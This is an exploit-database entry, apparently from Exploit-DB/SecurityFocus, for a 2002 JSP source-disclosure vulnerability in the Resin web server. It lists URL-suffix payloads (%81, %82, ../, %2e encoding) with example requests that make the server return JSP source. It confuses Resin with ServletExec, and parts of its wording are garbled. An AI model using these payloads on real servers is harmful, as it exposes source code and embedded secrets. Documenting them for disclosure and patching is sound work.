header-logo
Suggest Exploit
vendor:
Resin Web Server
by:
SecurityFocus
7.5
CVSS
HIGH
Source Disclosure
200
CWE
Product Name: Resin Web Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache (Win32), Resin Web Server, IIS 5
2002

Resin JSP Source Disclosure Vulnerability

ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent on the platform that Resin is running on. Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages. Apache (Win32): ..%2e..%81%82 Example: http://target/filename.jsp%81 Resin Web Server: ../ Example: http://target/filename.jsp../ IIS 5 requesting the URL encoded with ASCII: '%2' instead of '.' Example: http://target/filename%2ejsp

Mitigation:

Ensure that the web server is configured to deny requests for JSP source code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1986/info

Resin is a servlet and JSP engine that supports java and javascript.

ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent on the platform that Resin is running on.

Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.


Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../


IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp